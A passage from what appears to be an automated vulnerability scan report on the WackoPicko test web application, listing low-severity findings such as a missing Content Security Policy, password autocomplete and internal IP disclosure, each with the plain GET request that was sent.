    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36

    Content Security Policy (CSP) not implemented


    Affected item /WackoPicko/
    Affected parameter
    Request
    GET /WackoPicko/ HTTP/1.1
    Cookie: PHPSESSID=kc180u2rr3thbgefh30k8t06p4
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Email address found


    Affected item Web Server
    Affected parameter
    Request

    Password type input with auto-complete enabled


    Affected item Web Server
    Affected parameter
    Request
    GET /WackoPicko/users/login.php HTTP/1.1
    Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
    Accept: */*
    Accept-Encoding: gzip,deflate
    Host: 192.168.1.124
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/73.0.3683.103 Safari/537.36
    Connection: Keep-alive

    Possible internal IP address disclosure


    Affected item /WackoPicko/admin
    Affected parameter
    Request

    Possible internal IP address disclosure


    Affected item /WackoPicko/upload
    Affected parameter
    Request

    Possible internal IP address disclosure


    Affected item /WackoPicko/users
    Affected parameter
    Request

    You might also like